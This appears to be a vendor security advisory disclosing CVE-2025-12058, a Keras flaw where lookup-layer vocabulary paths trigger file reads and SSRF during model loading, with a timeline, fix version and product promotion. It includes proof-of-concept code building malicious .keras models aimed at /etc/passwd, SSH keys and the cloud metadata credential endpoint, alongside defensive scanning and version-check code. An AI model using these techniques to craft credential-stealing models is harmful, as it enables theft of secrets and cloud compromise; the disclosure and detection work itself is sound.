Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058)
Summary
Zscaler uncovered a vulnerability in Keras that exposed AI and machine learning environments to file access and network exploitation risks, highlighting the urgent need to secure the AI model supply chain. Through responsible disclosure and ongoing research, Zscaler helps enterprises stay protected from emerging AI threats with a Zero Trust approach.
This post provides a technical analysis of CVE-2025-12058: the root cause of the Keras model vulnerability, its attack vectors, and disclosure details.
Key Takeaways
- AI models increasingly introduce new security risks. Even trusted frameworks can contain flaws that expose data or systems and become attack vectors.
- Research and disclosure make AI safer. Transparent information sharing of CVEs and other key discoveries is a critical safety component across the open-source and security communities.
- Securing the AI supply chain is essential. Enterprises must verify the integrity of models, code, and data sources to prevent compromise through AI.
- Zero Trust principles extend to AI. The same verification principles that protect users and apps also apply to AI.
- Zscaler is leading in AI security. Our research and technology help organizations embrace transformation and use AI safely.
Overview
Keras Model - Arbitrary File Access and Server-Side Request Forgery
Zscaler identified a vulnerability in Keras 3.11.3 and earlier that allows arbitrary file access and potential Server-Side Request Forgery (SSRF) when loading malicious .keras model files.
The flaw exists in the StringLookup and IndexLookup preprocessing layers, which permit file paths or URLs in their vocabulary parameter. When loading a serialized model (.keras file), Keras reconstructs these layers and accesses the referenced paths during deserialization - even with safe_mode=True enabled.
This behavior bypasses user expectations of "safe" deserialization and can lead to:
- Arbitrary local file read (e.g., /etc/passwd, SSH keys, credentials)
- Server-Side Request Forgery (SSRF) when network schemes are supported
- Information disclosure via vocabulary exfiltration
Zscaler responsibly disclosed the issue to the Keras development team. The vulnerability is tracked as CVE-2025-12058 with a CVSS score of 5.9 (Medium) and was fixed in Keras version 3.11.4.
Technical Analysis of CVE-2025-12058
The vulnerability stems from how Keras handles model reconstruction during loading. Preprocessing layers (StringLookup and IndexLookup) allow file paths or URLs to be passed as input to define their vocabularies. When a .keras model is deserialized, these paths are automatically opened and read by TensorFlow’s file I/O system without proper validation or restriction. This means that even when security features like safe_mode are enabled, a malicious model can still instruct Keras to access local files or external URLs during load time, exposing sensitive data or enabling remote network requests.
Affected Components
- Layers: keras.layers.StringLookup, keras.layers.IndexLookup, potentially IntegerLookup
- Versions: Keras 3.11.3 (and likely earlier 3.x versions)
- Backend: Confirmed with TensorFlow backend 2.20.0
- Default Settings: Reproduces with safe_mode=True, no custom objects required
Root Cause
The StringLookup and IndexLookup layers accept a vocabulary parameter that can be either:
- An inline list/array of tokens
- A string path to a vocabulary file
During model deserialization, if the vocabulary is a string path, Keras uses TensorFlow's tf.io.gfile APIs to read the file. This filesystem API supports:
- Absolute local paths (e.g., /etc/passwd)
- file:// URLs
- Network URLs (http://, https://) when TensorFlow-IO is present
Critical Issue: safe_mode=True guards against unsafe callable deserialization but does not restrict I/O operations performed by built-in layers during reconstruction.
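To make the mechanism concrete, the sketch below builds a model whose StringLookup vocabulary points at a local file path instead of an inline token list. It is illustrative only: the target path is an example, and a real attacker would more likely plant the path in the serialized model config directly, since building the model this way requires the referenced file to exist on the builder's machine.

```python
# Illustrative sketch: a .keras model whose StringLookup vocabulary is a file
# path. The path below is an example; any readable text file works here.
import keras
from keras import layers

# The vocabulary argument accepts a path to a newline-delimited token file.
# That path is stored in the layer config and re-read when the model is loaded.
lookup = layers.StringLookup(vocabulary="/etc/passwd")

inputs = keras.Input(shape=(1,), dtype="string")
outputs = lookup(inputs)
model = keras.Model(inputs, outputs)

# The saved archive carries the vocabulary path, which is resolved again
# on whatever machine later loads the model.
model.save("malicious.keras")
```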
Real-World Impact Scenarios
ML Model Hub Compromise
Attackers upload a malicious .keras model to a public repository (e.g., Hugging Face, Kaggle).
When a victim downloads and loads the model, SSH private keys or local configuration files may be exposed.
Attack vector:
- Attacker uploads a malicious .keras model file to the public repository
- The model's StringLookup layer is configured with vocabulary="/home/victim/.ssh/id_rsa"
- Victim downloads and loads the model for evaluation or fine-tuning
- SSH private key contents are read into the model's vocabulary during deserialization
- Attacker retrieves the key by re-downloading the model or through vocabulary exfiltration
Potential impact: complete compromise of victim's SSH access to servers, code repositories, and cloud infrastructure. Attackers can pivot to active intrusion: clone private repos, inject backdoors or malicious commits into CI/CD, execute code in production, and move laterally.
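The victim-side view of the last three steps above is sketched below under the same assumptions (illustrative file names, Keras 3.x with the TensorFlow backend): once load_model() returns, the lines of the referenced file sit in the layer's vocabulary, where they can be re-serialized, logged, or otherwise exfiltrated.

```python
# Victim side (sketch): loading the downloaded model triggers the file read,
# even with safe_mode=True, and the file's lines become vocabulary tokens.
import keras

model = keras.models.load_model("malicious.keras", safe_mode=True)

for layer in model.layers:
    if isinstance(layer, keras.layers.StringLookup):
        # Each line of the referenced file (e.g., an SSH private key) is now a token.
        print(layer.get_vocabulary()[:5])
```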
Cloud Credential Theft
ML engineers deploy models in AWS/GCP/Azure environments that expose instance metadata services. A malicious model references metadata endpoints (e.g., http://169.254.169.254/), so loading it in a cloud VM or container returns IAM credentials.
Attack vector:
- Attacker crafts a model with vocabulary="http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"
- Model is loaded in a cloud VM or container with an IAM role attached
- AWS credentials (access key, secret key, session token) are fetched at load time
- Credentials populate the vocabulary and can be exfiltrated via get_vocabulary()
Potential impact: Full access to cloud resources under the compromised role. Attackers can take over infrastructure, exfiltrate data, deploy ransomware or crypto mining, erase logs, and pivot access across accounts.
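A sketch of how such a model could be produced is shown below. It assumes an HTTP-capable tf.io.gfile filesystem (e.g., via tensorflow-io, as noted under Root Cause) is available wherever the vocabulary URL is resolved; "role-name" is a placeholder, and in practice an attacker would plant the URL in the serialized config rather than fetch it at build time.

```python
# SSRF variant (sketch): the vocabulary points at the cloud metadata service.
# Requires a registered http:// filesystem (e.g., tensorflow-io); "role-name"
# is a placeholder for the victim instance's IAM role.
import keras
from keras import layers

imds_url = (
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"
)

lookup = layers.StringLookup(vocabulary=imds_url)  # resolved again at load time
inputs = keras.Input(shape=(1,), dtype="string")
model = keras.Model(inputs, lookup(inputs))
model.save("cloud_credential_stealer.keras")
```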
Supply Chain Attack via Pre-trained Models
An attacker publishes or poisons a popular pre-trained model that references local credential files (.gitconfig, .netrc), so CI/CD systems or developer machines leak tokens when the model is loaded. Development teams that use third-party pre-trained models for transfer learning may import these models and expose Git tokens, API keys, and source code.
Attack vector:
- Attacker compromises a popular pre-trained model repository or creates a malicious "state-of-the-art" model
- Model contains a StringLookup layer with vocabulary="file:///home/developer/.gitconfig" or "file:///home/developer/.netrc"
- Developers load the model in CI/CD pipelines or local development environments
- Git credentials, authentication tokens, and repository access details are extracted
- Attacker gains access to private source code repositories
Potential impact: Stolen dev credentials enable source code/IP theft and insertion of malicious code and backdoors into builds and signed artifacts. Backdoor releases can propagate downstream to customers and partners, triggering widespread compromise.
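One practical guardrail for this scenario, in line with the supply-chain takeaway above, is to refuse to load any model artifact whose checksum is not on an allowlist. The sketch below is a generic example (the file name and pinned digest are placeholders), not a complete defense, since a pinned hash only helps when the pinned model itself is trustworthy.

```python
# Sketch: verify a downloaded model against a pinned SHA-256 before loading it.
# The pinned digest and file name are placeholders.
import hashlib

import keras

PINNED_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

def sha256_of(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

model_path = "pretrained_model.keras"
if sha256_of(model_path) != PINNED_SHA256:
    raise RuntimeError(f"{model_path} does not match the pinned checksum; refusing to load.")

model = keras.models.load_model(model_path, safe_mode=True)
```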
How Zscaler Discovered CVE-2025-12058
This vulnerability was discovered during Zscaler's ongoing security research into AI/ML framework security and model supply chain risks. While analyzing Keras preprocessing layers, researchers observed that certain deserialization routines allowed file operations to execute before security controls were applied. Further analysis revealed that TensorFlow’s file handling APIs could access both local and remote resources through path references embedded in model files. This discovery highlights how even seemingly safe model loading mechanisms can expose enterprise systems to data exfiltration or SSRF attacks when handling untrusted AI models.
Discovery: Investigation of the StringLookup and IndexLookup layers showed that they accept a vocabulary parameter that can be either an inline list or a file path.
Deep inspection of the deserialization code revealed that:
- File paths in the vocabulary parameter are resolved using TensorFlow's tf.io.gfile API during model loading.
- This file access occurs before any safe_mode checks on custom objects.
- The API supports not just local paths but also file:// URLs and network schemes.
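A short illustration of that API surface is below. tf.io.gfile.GFile is TensorFlow's file I/O wrapper; the specific paths are examples, and http:// or https:// resolution depends on an additional filesystem plugin such as tensorflow-io being registered in the process.

```python
# tf.io.gfile resolves more than plain local paths, which is what turns a
# "vocabulary file" argument into a file-access / SSRF primitive.
import tensorflow as tf

# Absolute local path (example).
with tf.io.gfile.GFile("/etc/hostname", "r") as f:
    print(f.read())

# file:// URL form of a local path (example).
with tf.io.gfile.GFile("file:///etc/hostname", "r") as f:
    print(f.read())

# http:// and https:// URLs resolve as well once a matching filesystem
# plugin (e.g., tensorflow-io) is registered.
```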
As enterprises increasingly adopt AI/ML technologies, Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments.
Detection and Prevention with Zscaler AI Security Posture Management (AISPM)
Zscaler’s AI Security Posture Management (AISPM) solution provides protection against malicious or compromised AI models before deployment. This enterprise-grade security platform automatically detects CVE-2025-12058 and similar vulnerabilities in real time.
Its Model Scanning Engine performs:
- Deep inspection of ML model files (Keras, PyTorch, TensorFlow, ONNX)
- Static analysis to detect suspicious paths and network references
- Identification of SSRF or arbitrary file access vectors
- Binary-level inspection for embedded payloads
Figure: Zscaler AISPM detecting the Keras vocabulary injection vulnerability in a model file.
Zscaler AISPM enables organizations to secure their AI supply chain by preventing malicious models from infiltrating development and production environments, providing complete visibility into AI security risks across the enterprise.
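For teams without such tooling, the same idea can be approximated with a lightweight static check. The sketch below assumes the standard Keras 3 .keras packaging (a zip archive containing a config.json) and flags lookup layers whose vocabulary is a string (a path or URL) rather than an inline list, without ever loading the model.

```python
# Conceptual sketch (not Zscaler AISPM's implementation): statically inspect a
# .keras archive and flag StringLookup/IndexLookup/IntegerLookup configs whose
# "vocabulary" is a string path or URL instead of an inline token list.
import json
import zipfile

SUSPECT_LAYERS = {"StringLookup", "IndexLookup", "IntegerLookup"}

def find_vocabulary_paths(keras_path: str) -> list[str]:
    findings = []
    with zipfile.ZipFile(keras_path) as archive:
        config = json.loads(archive.read("config.json"))

    def walk(node):
        if isinstance(node, dict):
            if node.get("class_name") in SUSPECT_LAYERS:
                vocab = node.get("config", {}).get("vocabulary")
                if isinstance(vocab, str):  # a path or URL, not an inline list
                    findings.append(vocab)
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config)
    return findings

if __name__ == "__main__":
    for suspicious in find_vocabulary_paths("model.keras"):
        print(f"Suspicious vocabulary reference: {suspicious}")
```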
Disclosure Timeline
Sept 26, 2025 - Vulnerability reported to Keras team
Oct 14, 2025 - Vendor confirmed reproduction
Oct 20, 2025 - Fix released
Oct 22, 2025 - CVE-2025-12058 assigned
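Since the fix shipped in Keras 3.11.4, a quick way to confirm an environment is patched is to compare the installed version against that release. A minimal sketch, using the third-party packaging library for the version comparison:

```python
# Defensive check (sketch): warn if the installed Keras predates the patched
# release 3.11.4 referenced above.
import keras
from packaging.version import Version

if Version(keras.__version__) < Version("3.11.4"):
    print(f"Keras {keras.__version__} is affected by CVE-2025-12058; upgrade to >= 3.11.4.")
else:
    print(f"Keras {keras.__version__} includes the fix for CVE-2025-12058.")
```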
Conclusion
As enterprises increasingly integrate AI/ML technologies, securing the model supply chain becomes essential.
Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments, advancing trust in the evolving AI ecosystem.
References:
- CVE-2025-12058, CVSS 4.0 score 5.9 (Medium): AV:A/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
- Keras fix PR for version 3.11.4
- GitHub Advisory
Learn More
To explore the broader landscape of AI-driven threats and how to secure against these real-world attacks, read the Zscaler ThreatLabz 2025 AI Security Report.